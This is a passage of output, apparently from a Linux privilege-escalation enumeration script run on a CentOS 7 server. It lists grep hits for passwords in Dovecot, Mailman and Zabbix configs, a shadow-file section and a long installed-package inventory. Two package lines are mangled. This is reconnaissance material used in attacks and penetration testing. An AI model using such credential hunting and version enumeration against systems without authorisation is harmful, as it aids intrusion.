  2485. /etc/dovecot/conf.d/10-logging.conf:#auth_debug_passwords = no
  2486. /etc/dovecot/conf.d/10-ssl.conf:# If key file is password protected, give the password here. Alternatively
  2487. /etc/dovecot/conf.d/10-ssl.conf:# root owned 0600 file by using ssl_key_password = <path.
  2488. /etc/dovecot/conf.d/10-ssl.conf:#ssl_key_password =
  2489. /etc/dovecot/conf.d/auth-checkpassword.conf.ext:# Authentication for checkpassword users. Included from 10-auth.conf.
  2490. /etc/dovecot/conf.d/auth-checkpassword.conf.ext: driver = checkpassword
  2491. /etc/dovecot/conf.d/auth-checkpassword.conf.ext: args = /usr/bin/checkpassword
  2492. /etc/dovecot/conf.d/auth-checkpassword.conf.ext:# Standard checkpassword doesn't support direct userdb lookups.
  2493. /etc/dovecot/conf.d/auth-checkpassword.conf.ext:# If you need checkpassword userdb, the checkpassword must support
  2494. /etc/dovecot/conf.d/auth-checkpassword.conf.ext:# driver = checkpassword
  2495. /etc/dovecot/conf.d/auth-checkpassword.conf.ext:# args = /usr/bin/checkpassword
  2496. /etc/dovecot/conf.d/auth-static.conf.ext:# username or the password, or if there is a single password for all users:
  2497. /etc/dovecot/conf.d/auth-static.conf.ext:# - proxy frontend, where the backend verifies the password
  2498. /etc/dovecot/conf.d/auth-static.conf.ext:# - proxy backend, where the frontend already verified the password
  2499. /etc/dovecot/conf.d/auth-static.conf.ext:# args = proxy=y host=%1Mu.example.com nopassword=y
  2500. /etc/dovecot/conf.d/auth-static.conf.ext:# args = password=test
  2501. /etc/dovecot/conf.d/auth-system.conf.ext:# Shadow passwords for system users (NSS, /etc/shadow or similiar).
  2502. /etc/mailman/sitelist.cfg:# subscribed with. user_password - The user's password. user_name - The
  2503. /etc/mailman/sitelist.cfg:# password authentication.
  2504. /etc/zabbix/zabbix_agentd.conf:### Change -u<username> and add -p<password> if required
  2505.  
  2506. [+] Shadow File (Privileged)
  2507.  
  2508. [*] ENUMERATING PROCESSES AND APPLICATIONS...
  2509.  
  2510. [+] Installed Packages
  2511. GConf2-3.2.6-8.el7.x86_64
  2512. GeoIP-1.5.0-11.el7.x86_64
  2513. ImageMagick-6.7.8.9-15.el7_2.x86_64
  2514. ModemManager-glib-1.6.0-2.el7.x86_64
  2515. NetworkManager-1.4.0-20.el7_3.x86_64
  2516. NetworkManager-glib-1.4.0-20.el7_3.x86_64
  2517. NetworkManager-libnm-1.4.0-20.el7_3.x86_64
  2518. NetworkManager-tui-1.4.0-20.el7_3.x86_64
  2519. OpenEXR-libs-1.7.1-7.el7.x86_64
  2520. acl-2.2.51-12.el7.x86_64
  2521. adwaita-cursor-theme-3.14.1-1.el7.noarch
  2522. adwaita-icon-theme-3.14.1-1.el7.noarch
  2523. aic94xx-firmware-30-6.el7.noarch
  2524. alsa-firmware-1.0.28-2.el7.noarch
  2525. alsa-lib-1.1.1-1.el7.x86_64
  2526. alsa-tools-firmware-1.1.0-1.el7.x86_64
  2527. apr-1.4.8-3.el7.x86_64
  2528. apr-util-1.5.2-6.el7.x86_64
  2529. at-spi2-atk-2.14.1-1.el7.x86_64
  2530. at-spi2-core-2.14.1-2.el7.x86_64
  2531. atk-2.14.0-1.el7.x86_64
  2532. audit-2.6.5-3.el7_3.1.x86_64
  2533. audit-libs-2.6.5-3.el7_3.1.x86_64
  2534. authconfig-6.2.8-14.el7.x86_64
  2535. avahi-0.6.31-17.el7.x86_64
  2536. avahi-autoipd-0.6.31-17.el7.x86_64
  2537. avahi-libs-0.6.31-17.el7.x86_64
  2538. awstats-7.6-3.1.el7.noarch
  2539. basesystem-10.0-7.el7.centos.noarch
  2540. bash-4.2.46-21.el7_3.x86_64
  2541. bind-9.9.4-50.el7_3.1.x86_64
  2542. bind-libs-9.9.4-50.el7_3.1.x86_64
  2543. bind-libs-lite-9.9.4-50.el7_3.1.x86_64
  2544. bind-license-9.9.4-50.el7_3.1.noarch
  2545. bind-utils-9.9.4-50.el7_3.1.x86_64
  2546. binutils-2.25.1-22.base.el7.x86_64
  2547. biosdevname-0.7.2-1.el7.x86_64
  2548. btrfs-progs-4.4.1-1.el7.x86_64
  2549. bzip2-1.0.6-13.el7.x86_64
  2550. bzip2-libs-1.0.6-13.el7.x86_64
  2551. ca-certificates-2017.2.14-70.1.el7_3.noarch
  2552. cairo-1.14.2-1.el7.x86_64
  2553. cairo-gobject-1.14.2-1.el7.x86_64
  2554. centos-logos-70.0.6-3.el7.centos.noarch
  2555. centos-release-7-3.1611.el7.centos.x86_64
  2556. chkconfig-1.7.2-1.el7_3.1.x86_64
  2557. clamav-0.99.2-3.el7.centos.vm.x86_64
  2558. clamav-data-0.99.2-3.el7.centos.vm.noarch
  2559. clamav-filesystem-0.99.2-3.el7.centos.vm.noarch
  2560. clamav-lib-0.99.2-3.el7.centos.vm.x86_64
  2561. clamav-scanner-0.99.2-3.el7.centos.vm.noarch
  2562. clamav-scanner-systemd-0.99.2-3.el7.centos.vm.noarch
  2563. clamav-server-0.99.2-3.el7.centos.vm.x86_64
  2564. clamav-server-systemd-0.99.2-3.el7.centos.vm.noarch
  2565. clamav-update-0.99.2-3.el7.centos.vm.x86_64
  2566. clucene-core-2.3.3.4-11.el7.x86_64
  2567. colord-libs-1.2.7-2.el7.x86_64
  2568. coreutils-8.22-18.el7.x86_64
  2569. cpio-2.11-24.el7.x86_64
  2570. cracklib-2.9.0-11.el7.x86_64
  2571. cracklib-dicts-2.9.0-11.el7.x86_64
  2572. cronie-1.4.11-14.el7_2.1.x86_64
  2573. cronie-anacron-1.4.11-14.el7_2.1.x86_64
  2574. crontabs-1.11-6.20121102git.el7.noarch
  2575. cryptsetup-libs-1.7.2-1.el7.x86_64
  2576. cups-libs-1.6.3-26.el7.x86_64
  2577. curl-7.29.0-35.el7.centos.x86_64
  2578. cyrus-sasl-2.1.26-20.el7_2.x86_64
  2579. cyrus-sasl-gssapi-2.1.26-20.el7_2.x86_64
  2580. cyrus-sasl-lib-2.1.26-20.el7_2.x86_64
  2581. cyrus-sasl-md5-2.1.26-20.el7_2.x86_64
  2582. cyrus-sasl-plain-2.1.26-20.el7_2.x86_64
  2583. dbus-1.6.12-17.el7.x86_64
  2584. dbus-glib-0.100-7.el7.x86_64
  2585. dbus-libs-1.6.12-17.el7.x86_64
  2586. dbus-python-1.1.1-9.el7.x86_64
  2587. dejavu-fonts-common-2.33-6.el7.noarch
  2588. dejavu-sans-mono-fonts-2.33-6.el7.noarch
  2589. desktop-file-utils-0.22-1.el7.x86_64
  2590. device-mapper-1.02.135-1.el7_3.5.x86_64
  2591. device-mapper-event-1.02.135-1.el7_3.5.x86_64
  2592. device-mapper-event-libs-1.02.135-1.el7_3.5.x86_64
  2593. device-mapper-libs-1.02.135-1.el7_3.5.x86_64
  2594. device-mapper-persistent-data-0.6.3-1.el7.x86_64
  2595. dhclient-4.2.5-47.el7.centos.x86_64
  2596. dhcp-common-4.2.5-47.el7.centos.x86_64
  2597. dhcp-libs-4.2.5-47.el7.centos.x86_64
  2598. diffutils-3.3-4.el7.x86_64
  2599. dmidecode-3.0-2.1.el7_3.x86_64
  2600. dnsmasq-2.66-21.el7.x86_64
  2601. dovecot-2.2.10-7.el7.x86_64
  2602. dracut-033-463.el7_3.2.x86_64
  2603. dracut-config-rescue-033-463.el7_3.2.x86_64
  2604. dracut-network-033-463.el7_3.2.x86_64
  2605. e2fsprogs-1.42.9-9.el7.x86_64
  2606. e2fsprogs-libs-1.42.9-9.el7.x86_64
  2607. ebtables-2.0.10-15.el7.x86_64
  2608. elfutils-libelf-0.166-2.el7.x86_64
  2609. elfutils-libs-0.166-2.el7.x86_64
  2610. emacs-24.3-19.el7_3.x86_64
  2611. emacs-common-24.3-19.el7_3.x86_64
  2612. emacs-filesystem-24.3-19.el7_3.noarch
  2613. epel-release-7-9.noarch
  2614. ethtool-4.5-3.el7.x86_64
  2615. expat-2.1.0-10.el7_3.x86_64
  2616. file-5.11-33.el7.x86_64
  2617. file-libs-5.11-33.el7.x86_64
  2618. filesystem-3.2-21.el7.x86_64
  2619. findutils-4.5.11-5.el7.x86_64
  2620. fipscheck-1.4.1-5.el7.x86_64
  2621. fipscheck-lib-1.4.1-5.el7.x86_64
  2622. firewalld-0.4.3.2-8.1.el7_3.3.noarch
  2623. firewalld-filesystem-0.4.3.2-8.1.el7_3.3.noarch
  2624. fontconfig-2.10.95-10.el7.x86_64
  2625. fontpackages-filesystem-1.44-8.el7.noarch
  2626. freetype-2.4.11-12.el7.x86_64
  2627. fxload-2002_04_11-16.el7.x86_64
  2628. gawk-4.0.2-4.el7_3.1.x86_64
  2629. gd-2.0.35-26.el7.x86_64
  2630. gdbm-1.10-8.el7.x86_64
  2631. gdbm-devel-1.10-8.el7.x86_64
  2632. gdk-pixbuf2-2.31.6-3.el7.x86_64
  2633. gettext-0.18.2.1-4.el7.x86_64
  2634. gettext-libs-0.18.2.1-4.el7.x86_64
  2635. ghostscript-9.07-20.el7_3.7.x86_64
  2636. ghostscript-fonts-5.50-32.el7.noarch
  2637. giflib-4.1.6-9.el7.x86_64
  2638. glib-networking-2.42.0-1.el7.x86_64
  2639. glib2-2.46.2-4.el7.x86_64
  2640. glibc-2.17-157.el7_3.4.x86_64
  2641. glibc-common-2.17-157.el7_3.4.x86_64
  2642. glibc-devel-2.17-157.el7_3.4.x86_64
  2643. glibc-headers-2.17-157.el7_3.4.x86_64
  2644. gmp-6.0.0-12.el7_1.x86_64
  2645. gnupg2-2.0.22-4.el7.x86_64
  2646. gnutls-3.3.24-1.el7.x86_64
  2647. gobject-introspection-1.42.0-1.el7.x86_64
  2648. gpg-pubkey-11f63c51-3c7dc11d
  2649. gpg-pubkey-352c64e5-52ae6884
  2650. gpg-pubkey-8fae34bd-538f1e51
  2651. gpg-pubkey-a0bdbcf9-42d1d837
  2652. gpg-pubkey-f4a80eb5-53a7ff4b
  2653. gpgme-1.3.2-5.el7.x86_64
  2654. graphite2-1.3.6-1.el7_2.x86_64
  2655. grep-2.20-2.el7.x86_64
  2656. groff-base-1.22.2-8.el7.x86_64
  2657. grub2-2.02-0.44.el7.centos.x86_64
  2658. grub2-tools-2.02-0.44.el7.centos.x86_64
  2659. grubby-8.28-21.el7_3.x86_64
  2660. gsettings-desktop-schemas-3.14.2-1.el7.x86_64
  2661. gtk3-3.14.13-20.el7_3.1.x86_64
  2662. gzip-1.5-8.el7.x86_64
  2663. hardlink-1.0-19.el7.x86_64
  2664. harfbuzz-0.9.36-1.el7.x86_64
  2665. hicolor-icon-theme-0.12-7.el7.noarch
  2666. hostname-3.13-3.el7.x86_64
  2667. httpd-2.4.6-45.el7.centos.4vm.x86_64
  2668. httpd-tools-2.4.6-45.el7.centos.4vm.x86_64
  2669. hwdata-0.252-8.4.el7.x86_64
  2670. ilmbase-1.0.3-7.el7.x86_64
  2671. info-5.1-4.el7.x86_64
  2672. initscripts-9.49.37-1.el7_3.1.x86_64
  2673. iproute-3.10.0-74.el7.x86_64
  2674. iprutils-2.4.13.1-1.el7.x86_64
  2675. ipset-6.19-6.el7.x86_64
  2676. ipset-libs-6.19-6.el7.x86_64
  2677. iptables-1.4.21-17.el7.x86_64
  2678. iputils-20160308-8.el7.x86_64
  2679. irqbalance-1.0.7-6.el7_3.1.x86_64
  2680. ivtv-firmware-20080701-26.el7.noarch
  2681. iwl100-firmware-39.31.5.1-49.el7.noarch
  2682. iwl1000-firmware-39.31.5.1-49.el7.noarch
  2683. iwl105-firmware-18.168.6.1-49.el7.noarch
  2684. iwl135-firmware-18.168.6.1-49.el7.noarch
  2685. iwl2000-firmware-18.168.6.1-49.el7.noarch
  2686. iwl2030-firmware-18.168.6.1-49.el7.noarch
  2687. iwl3160-firmware-22.0.7.0-49.el7.noarch
  2688. iwl3945-firmware-15.32.2.9-49.el7.noarch
  2689. iwl4965-firmware-228.61.2.24-49.el7.noarch
  2690. iwl5000-firmware-8.83.5.1_1-49.el7.noarch
  2691. iwl5150-firmware-8.24.2.2-49.el7.noarch
  2692. iwl6000-firmware-9.221.4.1-49.el7.noarch
  2693. iwl6000g2a-firmware-17.168.5.3-49.el7.noarch
  2694. iwl6000g2b-firmware-17.168.5.2-49.el7.noarch
  2695. iwl6050-firmware-41.28.5.1-49.el7.noarch
  2696. iwl7260-firmware-22.0.7.0-49.el7.noarch
  2697. jansson-2.4-6.el7.x86_64
  2698. jasper-libs-1.900.1-30.el7_3.x86_64
  2699. jbigkit-libs-2.0-11.el7.x86_64
  2700. json-c-0.11-4.el7_0.x86_64
  2701. json-glib-1.0.2-1.el7.x86_64
  2702. kbd-1.15.5-12.el7.x86_64
  2703. kbd-legacy-1.15.5-12.el7.noarch
  2704. kbd-misc-1.15.5-12.el7.noarch
  2705. kernel-3.10.0-327.28.3.el7.x86_64
  2706. kernel-3.10.0-514.10.2.el7.x86_64
  2707. kernel-3.10.0-514.2.2.el7.x86_64
  2708. kernel-3.10.0-514.26.2.el7.x86_64
  2709. kernel-3.10.0-514.6.2.el7.x86_64
  2710. kernel-headers-3.10.0-514.26.2.el7.x86_64
  2711. kernel-tools-3.10.0-514.26.2.el7.x86_64
  2712. kernel-tools-libs-3.10.0-514.26.2.el7.x86_64
  2713. kexec-tools-2.0.7-50.el7.x86_64
  2714. keyutils-libs-1.5.8-3.el7.x86_64
  2715. keyutils-libs-devel-1.5.8-3.el7.x86_64
  2716. kmod-20-9.el7.x86_64
  2717. kmod-libs-20-9.el7.x86_64
  2718. kpartx-0.4.9-99.el7_3.3.x86_64
  2719. krb5-devel-1.14.1-27.el7_3.x86_64
  2720. krb5-libs-1.14.1-27.el7_3.x86_64
  2721. lcms2-2.6-3.el7.x86_64
  2722. less-458-9.el7.x86_64
  2723. libICE-1.0.9-2.el7.x86_64
  2724. libSM-1.2.2-2.el7.x86_64
  2725. libX11-1.6.3-3.el7.x86_64
  2726. libX11-common-1.6.3-3.el7.noarch
  2727. libXau-1.0.8-2.1.el7.x86_64
  2728. libXaw-1.0.12-5.el7.x86_64
  2729. libXcomposite-0.4.4-4.1.el7.x86_64
  2730. libXcursor-1.1.14-2.1.el7.x86_64
  2731. libXdamage-1.1.4-4.1.el7.x86_64
  2732. libXevie-1.0.3-7.1.el7.x86_64
  2733. libXext-1.3.3-3.el7.x86_64
  2734. libXfixes-5.0.1-2.1.el7.x86_64
  2735. libXfont-1.5.1-2.el7.x86_64
  2736. libXft-2.3.2-2.el7.x86_64
  2737. libXi-1.7.4-2.el7.x86_64
  2738. libXinerama-1.1.3-2.1.el7.x86_64
  2739. libXmu-1.1.2-2.el7.x86_64
  2740. libXpm-3.5.11-3.el7.x86_64
  2741. libXrandr-1.4.2-2.el7.x86_64
  2742. libXrender-0.9.8-2.1.el7.x86_64
  2743. libXt-1.1.4-6.1.el7.x86_64
  2744. libXtst-1.2.2-2.1.el7.x86_64
  2745. libXxf86vm-1.1.3-2.1.el7.x86_64
  2746. libacl-2.2.51-12.el7.x86_64
  2747. libaio-0.3.109-13.el7.x86_64
  2748. libassuan-2.1.0-3.el7.x86_64
  2749. libattr-2.4.46-12.el7.x86_64
  2750. libblkid-2.23.2-33.el7_3.2.x86_64
  2751. libcap-2.22-8.el7.x86_64
  2752. libcap-ng-0.7.5-4.el7.x86_64
  2753. libcom_err-1.42.9-9.el7.x86_64
  2754. libcom_err-devel-1.42.9-9.el7.x86_64
  2755. libcroco-0.6.8-5.el7.x86_64
  2756. libcurl-7.29.0-35.el7.centos.x86_64
  2757. libdaemon-0.14-7.el7.x86_64
  2758. libdb-5.3.21-19.el7.x86_64
  2759. libdb-devel-5.3.21-19.el7.x86_64
  2760. libdb-utils-5.3.21-19.el7.x86_64
  2761. libdrm-2.4.67-3.el7.x86_64
  2762. libedit-3.0-12.20121213cvs.el7.x86_64
  2763. libestr-0.1.9-2.el7.x86_64
  2764. libevent-2.0.21-4.el7.x86_64
  2765. libffi-3.0.13-18.el7.x86_64
  2766. libfontenc-1.1.2-3.el7.x86_64
  2767. libgcc-4.8.5-11.el7.x86_64
  2768. libgcrypt-1.5.3-13.el7_3.1.x86_64
  2769. libgomp-4.8.5-11.el7.x86_64
  2770. libgpg-error-1.12-3.el7.x86_64
  2771. libgudev1-219-30.el7_3.9.x86_64
  2772. libgusb-0.1.6-3.el7.x86_64
  2773. libidn-1.28-4.el7.x86_64
  2774. libjpeg-turbo-1.2.90-5.el7.x86_64
  2775. libkadm5-1.14.1-27.el7_3.x86_64
  2776. liblockfile-1.08-17.el7.x86_64
  2777. libmemcached-1.0.16-5.el7.x86_64
  2778. libmnl-1.0.3-7.el7.x86_64
  2779. libmodman-2.0.1-8.el7.x86_64
  2780. libmount-2.23.2-33.el7_3.2.x86_64
  2781. libndp-1.2-7.el7.x86_64
  2782. libnetfilter_conntrack-1.0.6-1.el7_3.x86_64
  2783. libnfnetlink-1.0.1-4.el7.x86_64
  2784. libnl3-3.2.28-3.el7_3.x86_64
  2785. libnl3-cli-3.2.28-3.el7_3.x86_64
  2786. libotf-0.9.13-4.el7.x86_64
  2787. libpcap-1.5.3-8.el7.x86_64
  2788. libpciaccess-0.13.4-3.el7_3.x86_64
  2789. libpipeline-1.2.3-3.el7.x86_64
  2790. libpng-1.5.13-7.el7_2.x86_64
  2791. libproxy-0.4.11-10.el7.x86_64
  2792. libpwquality-1.2.3-4.el7.x86_64
  2793. librsvg2-2.39.0-1.el7.x86_64
  2794. libselinux-2.5-6.el7.x86_64
  2795. libselinux-devel-2.5-6.el7.x86_64
  2796. libselinux-python-2.5-6.el7.x86_64
  2797. libselinux-utils-2.5-6.el7.x86_64
  2798. libsemanage-2.5-5.1.el7_3.x86_64
  2799. libsepol-2.5-6.el7.x86_64
  2800. libsepol-devel-2.5-6.el7.x86_64
  2801. libsoup-2.48.1-6.el7.x86_64
  2802. libss-1.42.9-9.el7.x86_64
  2803. libssh2-1.4.3-10.el7_2.1.x86_64
  2804. libstdc++-4.8.5-11.el7.x86_64
  2805. libsysfs-2.1.0-16.el7.x86_64
  2806. libtasn1-3.8-3.el7.x86_64
  2807. libteam-1.25-4.el7.x86_64
  2808. libthai-0.1.14-9.el7.x86_64
  2809. libtiff-4.0.3-27.el7_3.x86_64
  2810. libtirpc-0.2.4-0.8.el7_3.x86_64
  2811. libtool-ltdl-2.4.2-22.el7_3.x86_64
  2812. libunistring-0.9.3-9.el7.x86_64
  2813. libusbx-1.0.20-1.el7.x86_64
  2814. libuser-0.60-7.el7_1.x86_64
  2815. libutempter-1.1.6-4.el7.x86_64
  2816. libuuid-2.23.2-33.el7_3.2.x86_64
  2817. libverto-0.2.5-4.el7.x86_64
  2818. libverto-devel-0.2.5-4.el7.x86_64
  2819. libwmf-lite-0.2.8.4-41.el7_1.x86_64
  2820. libxcb-1.11-4.el7.x86_64
  2821. libxml2-2.9.1-6.el7_2.3.x86_64
  2822. libxshmfence-1.2-1.el7.x86_64
  2823. libxslt-1.1.28-5.el7.x86_64
  2824. libyaml-0.1.4-11.el7_0.x86_64
  2825. libzip-0.10.1-8.el7.x86_64
  2826. linux-firmware-20160830-49.git7534e19.el7.noarch
  2827. lm_sensors-libs-3.4.0-4.20160601gitf9185e5.el7.x86_64
  2828. logrotate-3.8.6-12.el7.x86_64
  2829. lsscsi-0.27-4.el7.x86_64
  2830. lua-5.1.4-15.el7.x86_64
  2831. lvm2-2.02.166-1.el7_3.5.x86_64
  2832. lvm2-libs-2.02.166-1.el7_3.5.x86_64
  2833. lzo-2.06-8.el7.x86_64
  2834. m17n-db-1.6.4-3.el7.noarch
  2835. m17n-lib-1.6.4-14.el7.x86_64
  2836. mailcap-2.1.41-2.el7.noarch
  2837. mailman-2.1.15-21.el7_1.x86_64
  2838. make-3.82-23.el7.x86_64
  2839. man-db-2.6.3-9.el7.x86_64
  2840. mariadb-5.5.52-1.el7.x86_64
  2841. mariadb-devel-5.5.52-1.el7.x86_64
  2842. mariadb-libs-5.5.52-1.el7.x86_64
  2843. mariadb-server-5.5.52-1.el7.x86_64
  2844. mesa-libEGL-11.2.2-2.20160614.el7.x86_64
  2845. mesa-libGL-11.2.2-2.20160614.el7.x86_64
  2846. mesa-libgbm-11.2.2-2.20160614.el7.x86_64
  2847. mesa-libglapi-11.2.2-2.20160614.el7.x86_64
  2848. microcode_ctl-2.1-16.3.el7_3.x86_64
  2849. mlocate-0.26-6.el7.x86_64
  2850. mod_dav_svn-1.7.14-10.el7.x86_64
  2851. mod_fcgid-2.3.9-4.el7.x86_64
  2852. mod_perl-2.0.10-2.el7.x86_64
  2853. mod_ssl-2.4.6-45.el7.centos.4vm.x86_64
  2854. mozjs17-17.0.0-19.el7.x86_64
  2855. nano-2.3.1-10.el7.x86_64
  2856. ncurses-5.9-13.20130511.el7.x86_64
  2857. ncurses-base-5.9-13.20130511.el7.noarch
  2858. ncurses-libs-5.9-13.20130511.el7.x86_64
  2859. neon-0.30.0-3.el7.x86_64
  2860. net-snmp-5.7.2-24.el7_3.2.x86_64
  2861. net-snmp-agent-libs-5.7.2-24.el7_3.2.x86_64
  2862. net-snmp-libs-5.7.2-24.el7_3.2.x86_64
  2863. net-tools-2.0-0.17.20131004git.el7.x86_64
  2864. nettle-2.7.1-8.el7.x86_64
  2865. newt-0.52.15-4.el7.x86_64
  2866. newt-python-0.52.15-4.el7.x86_64
  2867. nmap-ncat-6.40-7.el7.x86_64
  2868. nspr-4.13.1-1.0.el7_3.x86_64
  2869. nss-3.28.4-1.2.el7_3.x86_64
  2870. nss-softokn-3.16.2.3-14.4.el7.x86_64
  2871. nss-softokn-freebl-3.16.2.3-14.4.el7.x86_64
  2872. nss-sysinit-3.28.4-1.2.el7_3.x86_64
  2873. nss-tools-3.28.4-1.2.el7_3.x86_64
  2874. nss-util-3.28.4-1.0.el7_3.x86_64
  2875. numactl-libs-2.0.9-6.el7_2.x86_64
  2876. openldap-2.4.40-13.el7.x86_64
  2877. openssh-6.6.1p1-35.el7_3.x86_64
  2878. openssh-clients-6.6.1p1-35.el7_3.x86_64
  2879. openssh-server-6.6.1p1-35.el7_3.x86_64
  2880. openssl-1.0.1e-60.el7_3.1.x86_64
  2881. openssl-devel-1.0.1e-60.el7_3.1.x86_64
  2882. openssl-libs-1.0.1e-60.el7_3.1.x86_64
  2883. os-prober-1.58-9.el7.x86_64
  2884. p11-kit-0.20.7-3.el7.x86_64
  2885. p11-kit-trust-0.20.7-3.el7.x86_64
  2886. pakchois-0.4-10.el7.x86_64
  2887. pam-1.1.8-18.el7.x86_64
  2888. pango-1.36.8-2.el7.x86_64
  2889. parted-3.1-28.el7.x86_64
  2890. passwd-0.79-4.el7.x86_64
  2891. pciutils-libs-3.5.1-1.el7.x86_64
  2892. pcre-8.32-15.el7_2.1.x86_64
  2893. pcre-devel-8.32-15.el7_2.1.x86_64
  2894. perl-5.16.3-291.el7.x86_64
  2895. perl-Archive-Tar-1.92-2.el7.noarch
  2896. perl-BSD-Resource-1.29.07-1.el7.x86_64
  2897. perl-Business-ISBN-2.06-2.el7.noarch
  2898. perl-Business-ISBN-Data-20120719.001-2.el7.noarch
  2899. perl-CGI-3.63-4.el7.noarch
  2900. perl-Carp-1.26-244.el7.noarch
  2901. perl-Compress-Raw-Bzip2-2.061-3.el7.x86_64
  2902. perl-Compress-Raw-Zlib-2.061-4.el7.x86_64
  2903. perl-Crypt-OpenSSL-Bignum-0.04-18.el7.x86_64
  2904. perl-Crypt-OpenSSL-RSA-0.28-7.el7.x86_64
  2905. perl-Crypt-OpenSSL-Random-0.04-21.el7.x86_64
  2906. perl-Crypt-SSLeay-0.64-5.el7.x86_64
  2907. perl-DBD-MySQL-4.023-5.el7.x86_64
  2908. perl-DBD-Pg-2.19.3-4.el7.x86_64
  2909. perl-DBI-1.627-4.el7.x86_64
  2910. perl-DB_File-1.830-6.el7.x86_64
  2911. perl-Data-Dumper-2.145-3.el7.x86_64
  2912. perl-Digest-1.17-245.el7.noarch
  2913. perl-Digest-HMAC-1.03-5.el7.noarch
  2914. perl-Digest-MD5-2.52-3.el7.x86_64
  2915. perl-Digest-SHA-5.85-3.el7.x86_64
  2916. perl-Encode-2.51-7.el7.x86_64
  2917. perl-Encode-Detect-1.01-13.el7.x86_64
  2918. perl-Encode-Locale-1.03-5.el7.noarch
  2919. perl-Error-0.17020-2.el7.noarch
  2920. perl-Exporter-5.68-3.el7.noarch
  2921. perl-ExtUtils-Install-1.58-291.el7.noarch
  2922. perl-ExtUtils-MakeMaker-6.68-3.el7.noarch
  2923. perl-ExtUtils-Manifest-1.61-244.el7.noarch
  2924. perl-ExtUtils-ParseXS-3.18-2.el7.noarch
  2925. perl-FCGI-0.74-8.el7.x86_64
  2926. perl-File-Listing-6.04-7.el7.noarch
  2927. perl-File-Path-2.09-2.el7.noarch
  2928. perl-File-Temp-0.23.01-3.el7.noarch
  2929. perl-Filter-1.49-3.el7.x86_64
  2930. perl-Geo-IP-1.43-3.el7.x86_64
  2931. perl-Getopt-Long-2.40-2.el7.noarch
  2932. perl-HTML-Parser-3.71-4.el7.x86_64
  2933. perl-HTML-Tagset-3.20-15.el7.noarch
  2934. perl-HTTP-Cookies-6.01-5.el7.noarch
  2935. perl-HTTP-Daemon-6.01-5.el7.noarch
  2936. perl-HTTP-Date-6.02-8.el7.noarch
  2937. perl-HTTP-Message-6.06-6.el7.noarch
  2938. perl-HTTP-Negotiate-6.01-5.el7.noarch
  2939. perl-HTTP-Tiny-0.033-3.el7.noarch
  2940. perl-IO-Compress-2.061-2.el7.noarch
  2941. perl-IO-HTML-1.00-2.el7.noarch
  2942. perl-IO-Socket-INET6-2.69-5.el7.noarch
  2943. perl-IO-Socket-IP-0.21-4.el7.noarch
  2944. perl-IO-Socket-SSL-1.94-5.el7.noarch
  2945. perl-IO-Tty-1.10-11.el7.x86_64
  2946. perl-IO-Zlib-1.10-291.el7.noarch
  2947. perl-LWP-MediaTypes-6.02-2.el7.noarch
  2948. perl-Linux-Pid-0.04-18.el7.x86_64
  2949. perl-Mail-DKIM-0.39-8.el7.noarch
  2950. perl-Mail-SPF-2.8.0-4.el7.noarch
  2951. perl-MailTools-2.12-2.el7.noarch
  2952. perl-Net-DNS-0.72-6.el7.x86_64
  2953. perl-Net-Daemon-0.48-5.el7.noarch
  2954. perl-Net-HTTP-6.06-2.el7.noarch
  2955. perl-Net-IP-1.26-4.el7.noarch
  2956. perl-Net-LibIDN-0.12-15.el7.x86_64
  2957. perl-Net-SMTP-SSL-1.01-13.el7.noarch
  2958. perl-Net-SSLeay-1.55-4.el7.x86_64
  2959. perl-NetAddr-IP-4.069-3.el7.x86_64
  2960. perl-Package-Constants-0.02-291.el7.noarch
  2961. perl-PathTools-3.40-5.el7.x86_64
  2962. perl-PlRPC-0.2020-14.el7.noarch
  2963. perl-Pod-Escapes-1.04-291.el7.noarch
  2964. perl-Pod-Perldoc-3.20-4.el7.noarch
  2965. perl-Pod-Simple-3.28-4.el7.noarch
  2966. perl-Pod-Usage-1.63-3.el7.noarch
  2967. perl-Scalar-List-Utils-1.27-248.el7.x86_64
  2968. perl-Socket-2.010-4.el7.x86_64
  2969. perl-Socket6-0.23-15.el7.x86_64
  2970. perl-Storable-2.45-3.el7.x86_64
  2971. perl-Switch-2.16-7.el7.noarch
  2972. perl-Sys-Syslog-0.33-3.el7.x86_64
  2973. perl-Test-Harness-3.28-3.el7.noarch
  2974. perl-Text-ParseWords-3.29-4.el7.noarch
  2975. perl-Time-HiRes-1.9725-3.el7.x86_64
  2976. perl-Time-Local-1.2300-2.el7.noarch
  2977. perl-TimeDate-2.30-2.el7.noarch
  2978. perl-URI-1.60-9.el7.noarch
  2979. perl-WWW-RobotRules-6.02-5.el7.noarch
  2980. perl-XML-NamespaceSupport-1.11-10.el7.noarch
  2981. perl-XML-Parser-2.41-10.el7.x86_64
  2982. perl-XML-SAX-0.99-9.el7.noarch
  2983. perl-XML-SAX-Base-1.08-7.el7.noarch
  2984. perl-XML-Simple-2.20-5.el7.noarch
  2985. perl-constant-1.27-2.el7.noarch
  2986. perl-devel-5.16.3-291.el7.x86_64
  2987. perl-libs-5.16.3-291.el7.x86_64
  2988. perl-libwww-perl-6.05-2.el7.noarch
  2989. perl-macros-5.16.3-291.el7.x86_64
  2990. perl-parent-0.225-244.el7.noarch
  2991. perl-podlators-2.5.1-3.el7.noarch
  2992. perl-threads-1.87-4.el7.x86_64
  2993. perl-threads-shared-1.43-6.el7.x86_64
  2994. perl-version-0.99.07-2.el7.x86_64
  2995. t.16-42.el7.x86_64
  2996. php-cli-5.4.16-42.el7.x86_64
  2997. php-common-5.4.16-42.el7.x86_64
  2998. php-gd-5.4.16-42.el7.x86_64
  2999. php-ldap-5.4.16-42.el7.x86_64
  3000. php-mbstring-5.4.16-42.el7.x86_64
  3001. php-mysql-5.4.16-42.el7.x86_64
  3002. php-odbc-5.4.16-42.el7.x86_64
  3003. php-pdo-5.4.16-42.el7.x86_64
  3004. php-pear-1.9.4-21.el7.noarch
  3005. php-pgsql-5.4.16-42.el7.x86_64
  3006. php-process-5.4.16-42.el7.x86_64
  3007. php-snmp-5.4.16-42.el7.x86_64
  3008. php-soap-5.4.16-42.el7.x86_64
  3009. php-xml-5.4.16-42.el7.x86_64
  3010. php-xmlrpc-5.4.16-42.el7.x86_64
  3011. pinentry-0.8.1-17.el7.x86_64
  3012. pixman-0.34.0-1.el7.x86_64
  3013. pkgconfig-0.27.1-4.el7.x86_64
  3014. plymouth-0.8.9-0.26.20140113.el7.centos.x86_64
  3015. plymouth-core-libs-0.8.9-0.26.20140113.el7.centos.x86_64
  3016. plymouth-scripts-0.8.9-0.26.20140113.el7.centos.x86_64
  3017. policycoreutils-2.5-11.el7_3.x86_64tc
  3018. polkit-0.112-12.el7_3.x86_64
  3019. polkit-pkla-compat-0.1-4.el7.x86_64
